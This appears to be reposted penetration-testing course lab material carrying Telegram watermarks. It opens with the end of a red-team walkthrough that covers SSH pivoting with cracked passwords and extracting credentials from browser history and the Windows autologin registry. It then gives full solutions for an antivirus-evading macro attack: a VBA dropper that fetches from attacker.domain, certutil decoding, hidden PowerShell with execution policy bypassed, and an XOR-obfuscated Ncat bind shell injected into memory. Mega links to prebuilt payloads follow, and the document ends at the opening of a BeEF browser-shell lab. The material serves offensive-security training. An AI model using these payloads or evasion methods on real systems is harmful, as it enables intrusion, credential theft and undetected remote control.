https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

𝟐𝟐/𝒕𝒄𝒑 𝒐𝒑𝒆𝒏 𝒔𝒔𝒉 𝑶𝒑𝒆𝒏𝑺𝑺𝑯 𝟕.𝟐𝒑𝟐 𝑼𝒃𝒖𝒏𝒕𝒖 𝟒𝒖𝒃𝒖𝒏𝒕𝒖𝟐.𝟖 (𝑼𝒃𝒖𝒏𝒕𝒖

𝑳𝒊𝒏𝒖𝒙;𝒑𝒓𝒐𝒕𝒐𝒄𝒐𝒍 𝟐.𝟎)
23/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑡𝑒𝑙𝑛𝑒𝑡
25/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑠𝑚𝑡𝑝
80/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 ℎ𝑡𝑡𝑝
110/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑝𝑜𝑝3
<..SNIP..>

SSH server is running on TCP port 22. As

'jump-srv.mgmt.corp' machine is managed by
"jump-admin", we can try to do SSH to '10.10.3.3'
machine using Jump-Admin Domain user.

Perform SSH to 10.10.3.3 as jump-admin domain

user.

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑠𝑠ℎ −𝑙 𝑗𝑢𝑚𝑝−𝑎𝑑𝑚𝑖𝑛@𝑀𝐺𝑀𝑇.𝐶𝑂𝑅𝑃 10.10.3.3

NOTE: enter jump-admin cracked password
‘B@DB!tch’

We successfully SSHed to Jump-SRV.mgmt.corp as

the "jump-admin" domain user.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's also extract the bookmark URLs of Firefox

in this machine and look if any interesting
information can

be found (as jump-admin user).

As ‘Jump-admin’ domain user

𝑐𝑑 /.𝑚𝑜𝑧𝑖𝑙𝑙𝑎/𝑓𝑖𝑟𝑒𝑓𝑜𝑥/2𝑠3𝑝6𝑚1𝑣.𝑑𝑒𝑓𝑎𝑢𝑙𝑡−𝑟𝑒𝑙𝑒𝑎𝑠𝑒
𝑠𝑞𝑙𝑖𝑡𝑒3 𝑝𝑙𝑎𝑐𝑒𝑠.𝑠𝑞𝑙𝑖𝑡𝑒

Inside SQLite
.𝑡𝑎𝑏𝑙𝑒𝑠
𝑠𝑒𝑙𝑒𝑐𝑡 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠.𝑢𝑟𝑙 𝑓𝑟𝑜𝑚 𝑚𝑜𝑧_𝑝𝑙𝑎𝑐𝑒𝑠;
.𝑞𝑢𝑖𝑡

𝑓𝑜𝑢𝑛𝑑 𝑈𝑅𝐿:
𝒉𝒕𝒕𝒑𝒔://𝒂𝒅𝒎𝒊𝒏−𝒔𝒚𝒔.𝒔𝒊𝒕𝒆/𝒍𝒐𝒈𝒊𝒏.𝒂𝒔𝒑?𝒖𝒔𝒆𝒓=𝒔𝒚𝒔−𝒂𝒅𝒎𝒊𝒏&𝒑𝒂𝒔𝒔=𝑹𝒂𝒏𝒅𝟎𝒎𝒍
𝒚𝑺𝟑𝒍𝟑𝒄𝒕𝒆𝒅𝑷@𝒔𝒔

However, using firefox with proxychains querying

the login URL, shows that it is non-existent, Now

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

enumerate the IP address of admin-sys server by

pinging the URL.

𝑝𝑖𝑛𝑔 𝑎𝑑𝑚𝑖𝑛−𝑠𝑦𝑠.𝑠𝑖𝑡𝑒
Discovered IP address [192.168.1.2]

Performing TCP port scan on the target

"192.168.1.2" reveals that the 5985 port is open,
which means one can always do PowerShell
Remoting.

1. Admin-SYS

In order to perform PowerShell Remoting, we need

to apply some port forwarding techniques.

Exit the SSH session and re-establish a new

session with port forwarding switches.

Using port forwarding, we are specifying that all

the traffic sent locally will be forwarded to the
'admin-sys' server [192.168.1.2]

On a new bash session

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑠𝑠ℎ −𝑙 𝑗𝑢𝑚𝑝−𝑎𝑑𝑚𝑖𝑛@𝑀𝐺𝑀𝑇.𝐶𝑂𝑅𝑃 10.10.3.3 −𝐿
5985:192.168.1.2:5985
(Now at this very particular point, traffic from
your attacker machine can reach the admin-sys
machine)

Use Evil-WinRM to connect to 192.168.1.2 machine

with the discovered credentials

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

./𝑒𝑣𝑖𝑙−𝑤𝑖𝑛𝑟𝑚.𝑟𝑏 −𝑖 127.0.0.1 −𝑢 𝑠𝑦𝑠−𝑎𝑑𝑚𝑖𝑛 −𝑝

𝑅𝑎𝑛𝑑0𝑚𝑙𝑦𝑆3𝑙3𝑐𝑡𝑒𝑑𝑃@𝑠𝑠

Enumerating the environment reveals that

"sys-admin" is a local user at the admin-sys
server. Privilege escalation can be done by
querying the autologin registry.

Clear Text credentials of Administrator are

found.

On the recently established WinRM session

𝑟𝑒𝑔 𝑞𝑢𝑒𝑟𝑦 "𝐻𝐾𝐿𝑀\𝑆𝑂𝐹𝑇𝑊𝐴𝑅𝐸\𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡\𝑊𝑖𝑛𝑑𝑜𝑤𝑠
𝑁𝑇\𝐶𝑢𝑟𝑟𝑒𝑛𝑡𝑣𝑒𝑟𝑠𝑖𝑜𝑛\𝑊𝑖𝑛𝑙𝑜𝑔𝑜𝑛"

<..SNIP..>
𝐻𝐾𝐸𝑌_𝐿𝑂𝐶𝐴𝐿_𝑀𝐴𝐶𝐻𝐼𝑁𝐸\𝑆𝑂𝐹𝑇𝑊𝐴𝑅𝐸\𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡\𝑊𝑖𝑛𝑑𝑜𝑤𝑠
𝑁𝑇\𝐶𝑢𝑟𝑟𝑒𝑛𝑡𝑣𝑒𝑟𝑠𝑖𝑜𝑛\𝑊𝑖𝑛𝑙𝑜𝑔𝑜𝑛
𝐴𝑢𝑡𝑜𝑅𝑒𝑠𝑡𝑎𝑟𝑡𝑆ℎ𝑒𝑙𝑙 𝑅𝐸𝐺_𝐷𝑊𝑂𝑅𝐷 0𝑥1
𝐵𝑎𝑐𝑘𝑔𝑟𝑜𝑢𝑛𝑑 𝑅𝐸𝐺_𝑆𝑍 0 0 0
𝐶𝑎𝑐ℎ𝑒𝑑𝐿𝑜𝑔𝑜𝑛𝑠𝐶𝑜𝑢𝑛𝑡 𝑅𝐸𝐺_𝑆𝑍 10
𝐷𝑒𝑏𝑢𝑔𝑆𝑒𝑟𝑣𝑒𝑟𝐶𝑜𝑚𝑚𝑎𝑛𝑑 𝑅𝐸𝐺_𝑆𝑍 𝑛𝑜
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝑈𝑠𝑒𝑟𝑁𝑎𝑚𝑒 𝑅𝐸𝐺_𝑆𝑍 𝑨𝒅𝒎𝒊𝒏𝒊𝒔𝒕𝒓𝒂𝒕𝒐𝒓
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝐷𝑜𝑚𝑎𝑖𝑛𝑁𝑎𝑚𝑒 𝑅𝐸𝐺_𝑆𝑍 𝑊𝐼𝑁−10−𝑃𝑅𝑂−𝑋64
𝐴𝑢𝑡𝑜𝐴𝑑𝑚𝑖𝑛𝐿𝑜𝑔𝑜𝑛 𝑅𝐸𝐺_𝑆𝑍 1
𝐷𝑒𝑓𝑎𝑢𝑙𝑡𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 𝑅𝐸𝐺_𝑆𝑍 𝑻𝒆𝒔𝒕@𝟏𝟐𝟑
<..SNIP..>

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Reconnect to the 'admin-sys' server with local

administrator credentials.

./𝑒𝑣𝑖𝑙−𝑤𝑖𝑛𝑟𝑚.𝑟𝑏 −𝑖 127.0.0.1 −𝑢 𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟 −𝑝 𝑇𝑒𝑠𝑡@123

𝑡𝑦𝑝𝑒 𝐶:\𝑈𝑠𝑒𝑟𝑠\𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟\𝐷𝑒𝑠𝑘𝑡𝑜𝑝\𝑇𝑟𝑖𝑢𝑚𝑝ℎ.𝑡𝑥𝑡

<Result>
CONGRATULATIONS, YOU HAVE SUCCESSFULLY
COMPROMISED MULTI-FOREST RED TEAM ENVIRONMENT!!
<3
</Result>

Congratulations!!

The Multi-Forest Red Team Environment is

successfully compromised.

- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - -
-- - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - -- - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - -- - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - -
-- - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - - - - - - - - - - - -

Custom Undetectable Macro

Development LAB 1

Scenario
In the following lab, you can practice the attack
vector development techniques explained in the
Penetration Testing eXtreme course.

Your goal is to develop a custom macro-based

attack (and the accompanying payloads), to
compromise a target without being detected. The

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

compromise should occur through reflectively

injecting a PE file in the target's memory.

In this lab's context we are going to

reflectively inject [Ncat] and compromise the
target via a bind shell. Of course, you can use
any PE file, such as a custom RAT.

Imagine that you are delivering an internal

penetration test on a network featuring A/V, Host
IDS and Network IDS.

Scope of Engagement: NETBLOCK: 10.100.13.0/24

Goals

● Develop a custom macro-based attack and the

accompanying payloads

● Evade any A/V or IDS in place

● Reflectively inject a PE file in the target's

memory

What you will learn

During the lab, you will learn how various
techniques can be combined to compromise a target
during an internal social engineering campaign,
starting with a macro. You will also learn how to
evade modern defenses (A/V, HIDS, NIDS etc.), by

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

writing custom code and obfuscating your

payloads.

To guide you during the lab you will find

different tasks.

Tasks are meant for educational purposes and to

show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired though the task

you can achieve the lab goal.

If this is the first time doing this lab, we

advise you to follow these tasks.

Once you have completed all the tasks, you can

proceed to the end of this paper and check the
solutions

Recommended tools

● Microsoft Office
● [Powersploit's Invoke-ReflectivePEInjection]

Network Configuration & Credentials

You can use the 10.100.13.5 machine to develop
the required macro and accompanying payloads. You
can also use it to simulate the victim when both
your macro and the accompanying payloads are
complete

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Credentials:

● ELS_Admin
● P@ssw0rd123

You can connect to 10.100.13.5 through Remote

Desktop (rdesktop command if you are using Linux)

Important
Before proceeding with this lab's tasks, log
into the machine the above, navigate to the
Documents directory and delete everything that
is there, prior to the attack.

Otherwise the attack won't be successful !

Tasks
Task 1: Develop a custom macro and the accompanying
payloads

The first step of this lab is to create a custom

macro and the accompanying PE-injection related
payloads. This means that you should avoid using
automated tools, and that uncommon/obscure
techniques should be employed.

To do this, you can use any of the techniques

described in the Penetration Testing eXtreme
course - Advanced Social Engineering module. The
certutil-based dropper we covered in the course
is a practical technique for this lab's context.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As far as the PE-injection related payloads are

concerned, there are several ways and frameworks
to develop them. Powersploit's
[Invoke-ReflectivePEInjection] is a viable
technique for this lab's context.
[Invoke-ReflectivePEInjection] can reflectively
load a DLL/EXE into the PowerShell process, or it
can reflectively load a DLL into a remote
process.

Task 2: Evade any A/V or IDS in place

An important skill to have, as a penetration

tester / red team member, is the ability to craft
A/V and IDS resistant payloads. In the second
step of this lab you will exercise that skill.

Task 2.1: Develop A/V-resistant payloads

The certutil-based dropper seems in good shape,

as far as its A/V detection rate is concerned.
Although, since practice makes perfect, you can
further enhance its A/V resistance if you want.

[Invoke-ReflectivePEInjection] on the other hand

seems to get caught by many A/V vendors. Do not
worry though. Multiple A/Vs can be bypassed by
simply removing all comments and
renaming/obfuscating functions. Give this a
try...

Finally, on the "Develop IDS-resistant payloads"

sub-task below we will develop and utilize custom

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

XOR obfuscation/de-obfuscation for the attack's

stage payload. Since custom code is employed, the
payload will be quite A/V resistant.

Task 2.2: Develop IDS-resistant payloads

Sub-task 2.1: Develop A/V-Resistant Payloads

focuses on how to make the attack's stager evade
defenses. In order to make your payload
IDS-resistant, you will have to encode or
obfuscate the attack's stage payload.

One of the easiest ways to do this would be by

XORing all stage payloads. This means that the
stage payload, requested by the stager, will
enter the network being XOR-obfuscated. Then,
using a custom and PowerShell based XOR function,
you can decrypt them and execute them.

Task 3: Execute the attack

Now you fulfill all the prerequisites to inject a

PE file in the target's memory starting from a
macro and remaining undetected.

Solutions
Below, you can find solutions in the form of
source code, for each task. Remember though that
you can follow your own strategy (which may be
different from the one explained in the following
lab).

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Task 1: Develop a custom macro and the accompanying

payloads

A macro we can use to start our attack is the

following. Please note that this macro has a
large on-disk footprint and uses the WOW64
version of PowerShell.

Sub DownloadAndExec()
Dim xHttp: Set xHttp =
CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm =
CreateObject("Adodb.Stream")
xHttp.Open "GET",
"https://attacker.domain/ps1_b64.crt", False
xHttp.Send
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile "encoded_ps1.crt", 2
'//overwrite
End With
Shell ("cmd /c certutil -decode
encoded_ps1.crt decoded.ps1 &
c:\Windows\SysWOW64\WindowsPowerShell\v1.0\po
wershell.exe -ep bypass -W Hidden
.\decoded.ps1")
End Sub

For reflectively injecting a PE file, as we

already mentioned, we will use Powersploit's

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Invoke-ReflectivePEInjection. ps1_b64.crt will

contain both an A/V resistant
Invoke-ReflectivePEInjection variant and
custom-made XOR de-obfuscation for IDS resistance
(stage payload de-obfuscation).

Task 2: Evade any A/V or IDS in place

Task 2.1: Develop A/V-resistant payloads

To make Powersploit's
Invoke-ReflectivePEInjection more A/V-resistant,
you can simply remove every comment and rename
the first function to Invoke-PEInjectionInMemory.
You can find the altered source code on the link
below.

[https://gist.github.com/anonymous/67ae047664e940
7b053874e7e1732349]

Invoke-ReflectivePEInjection can be used to

reflectively inject a PE file into memory. You
can use this technique to inject Metasploit's or
PowerShell Empire's payloads or a custom-made
RAT. For this lab's context, we are going to
inject our favorite [Ncat].

Task 2.2: Develop IDS-resistant payloads

For making the attack's stage payload (the PE

file to be injected in memory - Ncat)
IDS-resistant we will perform the following
obfuscation steps.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

1. Convert ncat.exe to a Base64 string: Open

Windows PowerShell ISE, paste the following
PowerShell script and execute it.

function Convert-BinaryToString {
[CmdletBinding()] param (
[string] $FilePath
)
try {
$ByteArray =
[System.IO.File]::ReadAllBytes($FilePath);
}
catch {
throw "Failed to read file.";
}
if ($ByteArray) {
$Base64String =
[System.Convert]::ToBase64String($ByteArray);
}
else {
throw '$ByteArray is $null.';
}
Write-Output -InputObject $Base64String;
}
Convert-BinaryToString
path_to_ncat_executable

1. Create the key with which you will

XOR-obfuscate the Base64-converted ncat.exe,
you created in Step 1: Create a random Base64
string of equal length to the
Base64-converted ncat.exe. A quick way to do

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

this would be taking the Base64-converted

ncat.exe and replacing, for example, all "A"s
with "M"s.

2. XOR the Base64-converted ncat.exe with the

key you created in Step 2: To do this you can
use the PowerShell Script below.

param (
[Parameter(Mandatory=$true)]
[string] $file1, #First File
[Parameter(Mandatory=$true)]
[string] $file2, #Second file
[Parameter(Mandatory=$true)]
[string] $out #Output File
) #end param
$file1_b =
[System.IO.File]::ReadAllBytes("$file1")
$file2_b =
[System.IO.File]::ReadAllBytes("$file2")
$len = if ($file1_b.Count -lt $file2_b.Count)
{$file1_b.Count} else { $file2_b.Count}
$xord_byte_array = New-Object Byte[] $len
# XOR between the files
for($i=0; $i -lt $len ; $i++) {
$xord_byte_array[$i] = $file1_b[$i] -bxor
$file2_b[$i] }
[System.IO.File]::WriteAllBytes("$out",
$xord_byte_array)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

write-host "[*] $file1 XOR $file2`n[*] Saved

to " -nonewline;
Write-host "$out" -foregroundcolor yellow
-nonewline; Write-host ".";

Save the above PowerShell script locally (e.g.

xor_files.ps1), start a PowerShell session and
execute the following. The result will be an
XOR-obfuscated Ncat (in Base64 form).

PS >> powershell -ep bypass .\xor_files.ps1

.\Base64-converted_ncat .\XOR_key

1. Take the [altered

Invoke-ReflectivePEInjection], add the
following to the end (replacing
http://attacker.domain/xored_ncat and
http://attacker.domain/xor_key so that they
point to your server) and compress it using
gzip
([http://www.txtwizard.net/compression]).

#Drop the XORed Ncat from step 3 and the XOR

key from Step 2 to Temp
(new-object
Net.WebClient).DownloadFile('http://attacker.
domain/xored_ncat' , $env:temp+"/ciphertext")
(new-object
Net.WebClient).DownloadFile('http://attacker.
domain/xor_key' , $env:temp+"/key")

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

$ciphertext =
[System.IO.File]::ReadAllBytes($env:temp+"/ci
phertext")
$key =
[System.IO.File]::ReadAllBytes($env:temp+"/ke
y")
$len = if ($ciphertext.Count -lt $key.Count)
{$ciphertext.Count} else { $key.Count}
$xord_byte_array = New-Object Byte[] $len
#XOR between the XORed Ncat and the XOR key
for($i=0; $i -lt $len ; $i++) {
$xord_byte_array[$i] = $ciphertext[$i]
-bxor $key[$i] }
#The deciphered Ncat is stored on Temp
[System.IO.File]::WriteAllBytes($env:temp+"/d
eciphered", $xord_byte_array)
$deciphered = Get-Content
$env:temp/deciphered
$PEBytes =
[System.Convert]::FromBase64String($deciphere
d)
#De-obfuscated Ncat is reflectively loaded
into memory
Invoke-PEInjectionInMemory -PEBytes $PEBytes
-ExeArgs "-nlvp 4444 -e cmd"

You can find the full source code of the altered

Invoke-ReflectivePEInjection in the following
link.
https://gist.github.com/anonymous/01ff63395cc8b3a
8a6dad3402d3bf8b9

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

1. Finally, embed the gzip compressed altered

Invoke-ReflectivePEInjection you created in
Step 4 above into the following and save it
as a PS1 file.

$s=New-Object
IO.MemoryStream(,[Convert]::FromBase64String(
'insert_gzip_compressed_Invoke-ReflectivePEIn
jection'));
IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.
CompressionMode]::Decompress))).ReadToEnd()

Task 3: Execute the attack

To sum up, to execute the attack, perform the

following.

1. Base64-encode the PS1 file we created in

Step 5 of Task 2.2 and save it as a CRT file.
Host this file on a server you control. Also
host the XOR-obfuscated Ncat (Step 3 of Task
2.2) and the key (Step 2 of Task 2.2), so
that they can be accessed by the stager.

2. Inside the macro we developed in Task 1,

replace https://attacker.domain/ps1_b64.crt
with the location of the CRT file above.

3. Send the Office document containing the

macro to your target. For this lab's context,
you can RDP into the target machine
("rdesktop 10.100.13.5", credentials:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

ELS_Admin/P@ssw0rd123), transfer your

malicious Office document and execute it,
just like the target would do.

4. In a matter of minutes, you will should be

able to communicate with the target through a
bind shell on port 4444 (or the port you
specified on Step 4 of Task 2.2), as follows.

nc 192.168.60.5 4444

Bonus
If you have trouble creating any of the files
(and you are in a hurry). Please find them below
in order to try the attack.

● Book1.xls
https://mega.nz/file/cE1h1JbI#szFIlo6dmEp_0L7
IIRKAkOdh4_484ulLf3bLI98phMk

● ps1_b64.crt
https://mega.nz/file/oMthCJ4I#H7eP8C9-HbkJOgJ
GjwdmWEFzU4a06AfqbRd2eoUWrgE

● xored
https://mega.nz/file/FV0VwbbB#1ctSRHxYqlTdm0L
AG3_192OwAsUekwCeUZ9B1klmBvg

● key
https://mega.nz/file/cY0nlZbQ#zipB9xtpI_IIHmm

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

wceZPQzT6RuCkfKnW2q2MazOAr74

Establishing A Shell Through

the Victim's Browser LAB 2
Scenario
In this lab you will be able to practice the
attack vector development techniques explained in
the Penetration Testing eXtreme course.

During the lab, you will perform a remote social

engineering attack against a target. The attack's
requirements are the following.

● The target should visit an

attacker-controlled webpage with BeEF running
underneath
● The target should execute malicious code,
containing BeEF's bind shellcode, delivered
in any form, executable, macro, HTA file etc.
● A shell should be established through the
target's browser ONLY, using the above (BeEF
and BeEF's bind shellcode)
● Everything should occur from a single attack
vector

NOTE: You will be required to RDP in the lab

during specific tasks.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

What we actually want to achieve is the

following.

BeEF Bind Shellcode Background

BeEF's bind shellcode is used to establish a

shell through a target's browser. It was
originally created for inter-protocol
exploitation scenarios. This means the target
should not only have specific software installed
(where BeEF's bind shellcode exploits apply) but
he should also install a malicious browser
extension, which would bypass port banning, among
other things. Too many requirements ...

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The attack's stager and stage payload are

contained into BeEF's Eudora Mail 3 and Active
Fax 5.01 exploits.

Our Version of the Attack

On this lab we will modify BeEF's Eudora Mail 3

exploit and create a variation of this attack,
which applies on all social engineering cases and
doesn't require any installed software or browser
extension from the target. We will actually
create and send a malicious executable that will
inject the attack's stager into the target's
memory. Then, we will manually send the attack's
stage payload, using BeEF.

This way, we free ourselves from the requirement

of specific software and a browser extension
being installed on the target. Note that
everything will occur from a single attack
vector.

Our attack's requirements are as follows.

● The target's browser needs to be hooked using

BeEF

○ The attack's stage payload will be sent

using BeEF

○ The commands to be executed will be sent

and received using BeEF

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● The target must execute malicious code that

will inject BeEF's bind shellcode. The
malicious code could be included in an
executable, an HTA file etc.

Don't panic, we will automate most of the

attack's steps and put everything in a single
attack vector.

Note: For optimum results, we will perform the

attack against a Firefox browser. The attack
works on all browsers but it is optimized for
Firefox.

It should be noted here, that other ways exist to

achieve similar functionality, like the beaconing
malware that we covered in the Advanced Social
Engineering module.

Goals

● Develop a custom social engineering attack to

establish a stealthy shell through the
target's browser.

○ Create an A/V resistant payload that will

inject BeEF's bind shellcode, using
PowerShell and reflection.

○ Develop a custom AutoIt script and

executable to automate most of the

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

attack's lifecycle.

○ The shell should be difficult to detect,

everything should look like normal
browsing traffic.

What you will learn

During the lab, you will learn how various
techniques can be combined to compromise a
target, during a social engineering attack. You
will also learn how to evade modern defenses
(A/V, HIDS, NIDS etc.), by writing custom code
and misusing legitimate browser and .NET
functionality. Finally, you will get familiar
with the capabilities offered by AutoIt.

To guide you during the lab you will find

different tasks.

Tasks are meant for educational purposes and to

show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

